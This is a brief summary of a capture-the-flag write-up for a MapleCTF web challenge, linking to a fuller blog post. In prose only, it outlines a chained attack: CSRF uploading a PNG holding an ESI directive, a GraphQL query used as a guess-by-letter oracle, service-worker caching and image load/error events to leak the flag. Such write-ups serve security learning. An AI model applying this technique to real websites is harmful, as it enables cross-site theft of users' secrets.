[https://blog.bawolff.net/2023/10/ctf-writeup-jujutsu-kaisen-1-2-maplectf.html](https://blog.bawolff.net/2023/10/ctf-writeup-jujutsu-kaisen-1-2-maplectf.html)

tl;dr: CSRF to post with cookeis a PNG file that contains an ESI directive, which makes a graphQL query that renders the PNG either valid or invalid depending on if we guessed a letter fo the flag right. We cache the result of that in a service worker, and then load it again in an img tag so we can watch the onerror vs onload event handlers. The service worker is to ensure the result of the POST is loaded in the img tag instead of making a new GET request. See the [linked writeup](https://blog.bawolff.net/2023/10/ctf-writeup-jujutsu-kaisen-1-2-maplectf.html) for details.

Original writeup (https://blog.bawolff.net/2023/10/ctf-writeup-jujutsu-kaisen-1-2-maplectf.html).